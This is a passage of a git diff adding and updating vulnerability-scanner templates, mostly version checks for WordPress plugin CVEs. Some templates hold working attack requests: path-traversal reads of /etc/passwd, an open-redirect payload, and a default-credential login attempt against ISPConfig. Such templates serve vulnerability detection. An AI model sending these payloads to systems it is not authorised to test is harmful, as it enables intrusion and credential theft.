type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6665.yaml b/poc/cve/CVE-2024-6665.yaml new file mode 100644 index 0000000000..1948994400 --- /dev/null +++ b/poc/cve/CVE-2024-6665.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6665 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.5 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'yt_apikey' parameter in all versions up to, and including, 4.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ff5094a-8cf2-4c18-921d-7ec31d60c13a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6665 + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:CVE-2024-6665' + tags: cve,wordpress,wp-plugin,kbucket,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6667.yaml b/poc/cve/CVE-2024-6667.yaml new file mode 100644 index 0000000000..664e57584b --- /dev/null +++ b/poc/cve/CVE-2024-6667.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6667 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 4.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6667 + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:CVE-2024-6667' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7351.yaml b/poc/cve/CVE-2024-7351.yaml new file mode 100644 index 0000000000..cf0eeb23c2 --- /dev/null +++ b/poc/cve/CVE-2024-7351.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7351 + +info: + name: > + Simple Job Board <= 2.12.3 - Authenticated (Editor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.3 via deserialization of untrusted input when editing job applications. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-7351 + metadata: + fofa-query: "wp-content/plugins/simple-job-board/" + google-query: inurl:"/wp-content/plugins/simple-job-board/" + shodan-query: 'vuln:CVE-2024-7351' + tags: cve,wordpress,wp-plugin,simple-job-board,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-job-board/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-job-board" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7568.yaml b/poc/cve/CVE-2024-7568.yaml new file mode 100644 index 0000000000..19523db496 --- /dev/null +++ b/poc/cve/CVE-2024-7568.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7568 + +info: + name: > + Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Deletion + author: topscoder + severity: medium + description: > + The Favicon Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the output_sub_admin_page_0 function. This makes it possible for unauthenticated attackers to delete arbitrary files on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The plugin author deleted the functionality of the plugin to patch this issue and close the plugin, we recommend seeking an alternative to this plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb3ad80-3510-4018-91af-b733ef62e28f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: CVE-2024-7568 + metadata: + fofa-query: "wp-content/plugins/favicon-generator/" + google-query: inurl:"/wp-content/plugins/favicon-generator/" + shodan-query: 'vuln:CVE-2024-7568' + tags: cve,wordpress,wp-plugin,favicon-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "favicon-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7656.yaml b/poc/cve/CVE-2024-7656.yaml new file mode 100644 index 0000000000..9396fcc0f6 --- /dev/null +++ b/poc/cve/CVE-2024-7656.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7656 + +info: + name: > + Image Hotspot by DevVN <= 1.2.5 - Authenticated (Author+) PHP Object Injection + author: topscoder + severity: low + description: > + The Image Hotspot by DevVN plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.5 via deserialization of untrusted input in the 'devvn_ihotspot_shortcode_func' function. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7656 + metadata: + fofa-query: "wp-content/plugins/devvn-image-hotspot/" + google-query: inurl:"/wp-content/plugins/devvn-image-hotspot/" + shodan-query: 'vuln:CVE-2024-7656' + tags: cve,wordpress,wp-plugin,devvn-image-hotspot,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/devvn-image-hotspot/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "devvn-image-hotspot" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8120.yaml b/poc/cve/CVE-2024-8120.yaml new file mode 100644 index 0000000000..aa56580c71 --- /dev/null +++ b/poc/cve/CVE-2024-8120.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8120 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Cross-Site Request in Several AJAX Actions + author: topscoder + severity: medium + description: > + The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.14. This is due to missing or incorrect nonce validation on several functions in the class/class-image-otimizer.php file. This makes it possible for unauthenticated attackers to update plugin settings along with performing other actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N + cvss-score: 4.7 + cve-id: CVE-2024-8120 + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:CVE-2024-8120' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index e714f96cca..fda684a006 100644 --- a/poc/cve/cve-2008-5587.yaml +++ b/poc/cve/cve-2008-5587.yaml @@ -1,27 +1,28 @@ id: CVE-2008-5587 - info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ + - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 + - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." - + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/cve/cve-2017-14524.yaml b/poc/cve/cve-2017-14524.yaml index e87149510b..20a95213bc 100644 --- a/poc/cve/cve-2017-14524.yaml +++ b/poc/cve/cve-2017-14524.yaml @@ -1,25 +1,43 @@ id: CVE-2017-14524 + info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect author: 0x_Akoko - severity: low - description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. + severity: medium + description: | + OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://www.cvedetails.com/cve/CVE-2017-14524 - - https://vuldb.com/?id.107201 - tags: cve,cve2017,redirect,opentext + - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 -requests: + epss-score: 0.00258 + epss-percentile: 0.6357 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve2017,cve,redirect,opentext,seclists + +http: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' + - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml index ccf03eab13..548327e206 100644 --- a/poc/cve/cve-2018-1271.yaml +++ b/poc/cve/cve-2018-1271.yaml @@ -1,18 +1,20 @@ id: CVE-2018-1271 - info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - + description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + - https://pivotal.io/security/cve-2018-1271 + - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 + - https://access.redhat.com/errata/RHSA-2018:1320 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.90 + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." - + tags: cve,cve2018,spring,lfi,traversal requests: - method: GET path: diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml index 2392e8714b..e2eabe600d 100644 --- a/poc/cve/cve-2018-15473.yaml +++ b/poc/cve/cve-2018-15473.yaml @@ -1,28 +1,28 @@ id: CVE-2018-15473 + info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 - - https://bugs.debian.org/906236 - - http://www.openwall.com/lists/oss-security/2018/08/15/5 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2018-15473 cwe-id: CWE-362 - tags: network,openssh,cve,cve2018 + + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' + extractors: - type: regex regex: diff --git a/poc/cve/cve-2018-15535.yaml b/poc/cve/cve-2018-15535.yaml index ed7aa501ed..a4fa48f002 100644 --- a/poc/cve/cve-2018-15535.yaml +++ b/poc/cve/cve-2018-15535.yaml @@ -1,31 +1,32 @@ id: CVE-2018-15535 + info: - name: Responsive FileManager <9.13.4 - Local File Inclusion + name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo severity: high - description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. + description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 - - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 - - http://seclists.org/fulldisclosure/2018/Aug/34 - - https://www.exploit-db.com/exploits/45271/ + - https://www.cvedetails.com/cve/CVE-2018-15535 + classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi + requests: - method: GET path: - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/poc/default/ispconfig-default-login.yaml b/poc/default/ispconfig-default-login.yaml new file mode 100644 index 0000000000..8151c6d669 --- /dev/null +++ b/poc/default/ispconfig-default-login.yaml @@ -0,0 +1,63 @@ +id: ispconfig-default-login + +info: + name: ISPConfig - Default Password + author: pussycat0x + severity: high + description: | + ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: "http.title:\"ispconfig\"" + tags: default-login,ispconfig + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Connection: close + Referer: {{RootURL}}/login/ + + username={{username}}&password={{password}}&s_mod=login&s_pg=index + + - | + GET /sites/web_vhost_domain_list.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/index.php + + attack: pitchfork + payloads: + username: + - 'admin' + - 'guest' + - 'root' + password: + - 'admin' + - 'password' + - 'toor' + + stop-at-first-match: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - Tools + - Websites + condition: and + + - type: status + status: + - 200 +# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/wowza-streaming-detect.yaml b/poc/detect/wowza-streaming-detect.yaml index 3d40c90531..20093618e0 100644 --- a/poc/detect/wowza-streaming-detect.yaml +++ b/poc/detect/wowza-streaming-detect.yaml @@ -1,15 +1,17 @@ id: wowza-streaming-engine + info: name: Wowza Streaming Engine author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22 tags: panel + requests: - method: GET path: - '{{BaseURL}}/enginemanager/ftu/welcome.htm' + matchers-condition: and matchers: - type: word diff --git a/poc/favicon/favicon-generator.yaml b/poc/favicon/favicon-generator.yaml new file mode 100644 index 0000000000..fe88f3c6fd --- /dev/null +++ b/poc/favicon/favicon-generator.yaml @@ -0,0 +1,59 @@ +id: favicon-generator + +info: + name: > + Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Deletion + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb3ad80-3510-4018-91af-b733ef62e28f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/favicon-generator/" + google-query: inurl:"/wp-content/plugins/favicon-generator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,favicon-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "favicon-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/header/header-footer-code.yaml b/poc/header/header-footer-code.yaml new file mode 100644 index 0000000000..0a7010be97 --- /dev/null +++ b/poc/header/header-footer-code.yaml @@ -0,0 +1,59 @@ +id: header-footer-code + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3256da87-0d37-4c8f-9bac-95e3017e35d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/header/log4j-header.yaml b/poc/header/log4j-header.yaml index d0b090cb27..1d617fc7fd 100644 --- a/poc/header/log4j-header.yaml +++ b/poc/header/log4j-header.yaml @@ -1,23 +1,90 @@ id: log4j-fuzz-head-poc info: - name: log4j-fuzz-rce2 - author: rdnt + name: "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints" + description: | + Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features + used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other + JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary + code loaded from LDAP servers when message lookup substitution is enabled. + From log4j 2.15.0, this behavior has been disabled by default. + From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. + Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, + or other Apache Logging Services projects. + author: xxx,topscoder severity: critical - tags: apache,rce + reference: + - https://logging.apache.org/log4j/2.x/security.html + - http://www.openwall.com/lists/oss-security/2021/12/10/1 + - http://www.openwall.com/lists/oss-security/2021/12/10/2 + - http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html + - https://security.netapp.com/advisory/ntap-20211210-0007/ + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + - http://www.openwall.com/lists/oss-security/2021/12/10/3 + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032 + - https://www.oracle.com/security-alerts/alert-cve-2021-44228.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/ + - http://www.openwall.com/lists/oss-security/2021/12/13/1 + - http://www.openwall.com/lists/oss-security/2021/12/13/2 + - https://twitter.com/kurtseifried/status/1469345530182455296 + - https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html + - https://www.debian.org/security/2021/dsa-5020 + - https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf + - http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html + - http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html + - http://www.openwall.com/lists/oss-security/2021/12/14/4 + - https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html + - https://www.kb.cert.org/vuls/id/930724 + - http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html + - http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html + - http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html + - http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html + - http://www.openwall.com/lists/oss-security/2021/12/15/3 + - https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf + - https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/ + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + - https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf + - http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html + - https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf + - http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/ + - https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md + - http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html + - https://www.oracle.com/security-alerts/cpujan2022.html + - https://github.com/cisagov/log4j-affected-db + - https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001 + - https://support.apple.com/kb/HT213189 + - http://seclists.org/fulldisclosure/2022/Mar/23 + - https://www.oracle.com/security-alerts/cpuapr2022.html + - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228 + - https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html + - http://seclists.org/fulldisclosure/2022/Jul/11 + - http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html + - http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html + - http://seclists.org/fulldisclosure/2022/Dec/2 + classification: + cvss-metrics: 